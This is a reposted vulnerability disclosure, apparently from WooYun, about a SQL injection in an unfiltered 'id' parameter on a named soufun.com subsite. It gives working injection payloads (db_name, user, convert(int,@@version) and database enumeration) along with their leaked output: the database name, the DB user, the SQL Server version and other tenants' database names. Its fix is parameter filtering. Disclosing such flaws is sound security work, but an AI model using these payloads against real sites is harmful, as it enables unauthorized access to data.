来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] http://gz.soufun.com/popsite/meilin/shownewsen.asp?id=140未对参数进行过滤导致数据和服务器信息泄漏等问题应该还能进一步下去漏洞证明:http://gz.soufun.com/popsite/meilin/shownewsen.asp?id=140and db_......
http://gz.soufun.com/popsite/meilin/shownewsen.asp?id=140
未对参数进行过滤导致数据和服务器信息泄漏等问题 应该还能进一步下去 漏洞证明:http://gz.soufun.com/popsite/meilin/shownewsen.asp?id=140 and db_name()>0 -> db:meilinjiye and user>0 -> user:meilin and 1=convert(int,@@version)-- ->version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) and 0 <> db_name(n) 0-> 'meilinjiye' 1-> 'master' 2-> 'tempdb' 3-> 'model' 4-> 'msdb' 5-> 'pubs' 6-> 'Northwind' 7-> 'njtlg' 8-> 'meilinjiye' 9-> 'chengkai' 10-> 'futongdb' 11-> 'shresource' 12-> 'sfb_xk' 13-> 'rjcpddb' 14-> 'szhouse' 15-> 'lingpeng' 16-> 'njyb' 17-> 'hongda' 18-> 'songdu' 19-> 'myhwk' 20-> 'cshouse' 24-> 'www.jufeng.com' 26-> 'vanke' 27-> 'www.zjnahc.com' 28-> 'www.qcfc.net' 29-> 'www.easeskyplaza.com' 30-> 'HuaRunXHJ' 33-> 'www.zjszfc.com.cn' 40-> 'www.dyxfc.com' 45-> 'www.abbewa.com' 46-> 'www.gzpma.com' 47-> 'www.shangshuiyuan.com' 49-> 'WuHan_Hits' ... 修复方案: 过滤参数 作者Ambulong@乌云 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com